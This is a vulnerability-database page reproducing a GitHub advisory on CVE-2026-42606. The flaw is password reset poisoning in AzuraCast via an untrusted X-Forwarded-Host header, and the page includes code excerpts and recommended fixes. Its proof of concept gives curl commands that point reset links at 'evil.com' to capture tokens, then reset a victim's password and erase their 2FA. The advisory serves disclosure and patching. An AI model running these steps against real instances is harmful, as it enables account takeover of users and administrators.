Skip to main content

Docker CVE-2026-42606

HIGH
Weak Password Recovery Mechanism for Forgotten Password (CWE-640)
2026-05-04 https://github.com/AzuraCast/AzuraCast GHSA-gv7r-3mr9-h5x8
8.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.1 HIGH
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 04, 2026 - 21:46 vuln.today
Analysis Generated
May 04, 2026 - 21:46 vuln.today

DescriptionGitHub Advisory

Summary

The ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker's server. The attacker then uses the token on the real instance to reset the victim's password and destroy their 2FA configuration, achieving full account takeover.

Details

Root Cause 1: Unconditional X-Forwarded-Host Trust

backend/src/Middleware/ApplyXForwarded.php:35-40:

php
if ($request->hasHeader('X-Forwarded-Host')) {
    $hasXForwardedHeader = true;
    $xfHost = Types::stringOrNull($request->getHeaderLine('X-Forwarded-Host'), true);
    if (null !== $xfHost) {
        $uri = $uri->withHost($xfHost);
    }
}

There is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.

In the default Docker deployment, nginx's PHP location block (util/docker/web/nginx/azuracast.conf.tmpl:150-171) uses fastcgi_pass with include fastcgi_params. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as HTTP_* parameters. The proxy_params.conf file - which explicitly sets X-Forwarded-For, X-Forwarded-Proto, and X-Forwarded-Port - only applies to proxy_pass directives (websocket and vite dev server), NOT to the fastcgi_pass PHP handler. Therefore, client-supplied X-Forwarded-Host reaches PHP unmodified.

Root Cause 2: Request Host Used for Security-Critical URLs

backend/src/Http/Router.php:53-77 in buildBaseUrl():

php
$useRequest ??= $settings->prefer_browser_url; // default: true

// ...
if ($useRequest || $baseUrl->getHost() === '') {
    $ignoredHosts = ['web', 'nginx', 'localhost'];
    if (!in_array($currentUri->getHost(), $ignoredHosts, true)) {
        $baseUrl = (new Uri())
            ->withScheme($currentUri->getScheme())
            ->withHost($currentUri->getHost())
            ->withPort($currentUri->getPort());
    }
}

With prefer_browser_url = true (the default at backend/src/Entity/Settings.php:109), the request URI host - already poisoned by ApplyXForwarded - is used as the base URL for generating absolute URLs. Even if a base_url is configured in settings, it is overridden by the poisoned request host.

Root Cause 3: Password Reset Generates Absolute URL

backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77:

php
$router = $request->getRouter();
$url = $router->named(
    routeName: 'account:login-token',
    routeParams: ['token' => $token],
    absolute: true
);

This URL is embedded in the password reset email sent to the victim.

Root Cause 4: Reset Token Wipes 2FA

backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75:

php
$user->setNewPassword($data['password']);
$user->two_factor_secret = null;

When a ResetPassword token is consumed, the user's 2FA secret is unconditionally destroyed.

PoC

Prerequisites: An AzuraCast instance with a user account (e.g., admin@target.com) that has 2FA enabled. Attacker controls evil.com with a web server that logs incoming requests.

Step 1: Trigger poisoned password reset

bash
curl -X POST https://target.azuracast.example/forgot \
  -H "X-Forwarded-Host: evil.com" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "email=admin@target.com"

Expected result: The password reset email sent to admin@target.com contains a URL like:

https://evil.com/login-token/abc123def456...

Step 2: Capture the token

When the victim clicks the link in their email, their browser navigates to https://evil.com/login-token/abc123def456.... The attacker's web server at evil.com captures the full URL path, extracting the token abc123def456....

Step 3: Use token on real instance

bash
# First, GET the reset page to obtain CSRF token
curl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...
# Extract CSRF token from response, then POST new password
curl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "csrf=<extracted_csrf_token>&password=AttackerPassword123"

Result: The victim's password is changed to AttackerPassword123 and their 2FA is destroyed (two_factor_secret = null). The attacker is logged in with full access.

Impact

  • Full account takeover of any user account, including administrators, without any prior authentication
  • 2FA bypass - the password reset flow unconditionally destroys 2FA configuration, negating its security benefit
  • Administrative compromise - if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings
  • The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success

Recommended Fix

Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist

In backend/src/Middleware/ApplyXForwarded.php, only apply X-Forwarded-* headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):

php
// Add trusted proxy check
$trustedProxies = ['127.0.0.1', '::1', 'nginx', 'web'];
$remoteAddr = $request->getServerParams()['REMOTE_ADDR'] ?? '';

if (!in_array($remoteAddr, $trustedProxies, true)) {
    return $handler->handle($request);
}

// ... existing X-Forwarded-* processing

Fix 2 (Defense in depth): Use configured base URL for security-critical emails

In ForgotPasswordAction.php, generate the reset URL using the configured base_url setting rather than the request-derived URL:

php
$router = $request->getRouter();
$url = $router->named(
    routeName: 'account:login-token',
    routeParams: ['token' => $token],
    absolute: true,
    // Force use of configured base URL, not request host
);

Or modify Router::buildBaseUrl() to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.

Fix 3 (Defense in depth): Don't wipe 2FA on password reset

In LoginTokenAction.php:75, remove the line $user->two_factor_secret = null;. If 2FA recovery is needed, it should be a separate, explicit flow - not a side effect of password reset.

AnalysisAI

Password reset poisoning in AzuraCast versions ≤0.23.5 allows remote attackers to achieve full account takeover via client-supplied X-Forwarded-Host header injection. The ApplyXForwarded middleware lacks trusted proxy validation, enabling unauthenticated attackers to poison password reset URLs sent to victims. When victims click the poisoned link, their reset token is exfiltrated to attacker-controlled infrastructure. The attacker then redeems the token on the legitimate instance to reset the victim's password and unconditionally destroy their 2FA configuration, bypassing multi-factor authentication protections. Vendor-confirmed patch released in version 0.23.6. No public exploit identified at time of analysis. CVSS 8.1 reflects network attack vector with user interaction required (clicking email link). The vulnerability is limited to deployments using the default Docker configuration with nginx+PHP-FPM where fastcgi_pass forwards client headers unfiltered.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-42606 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy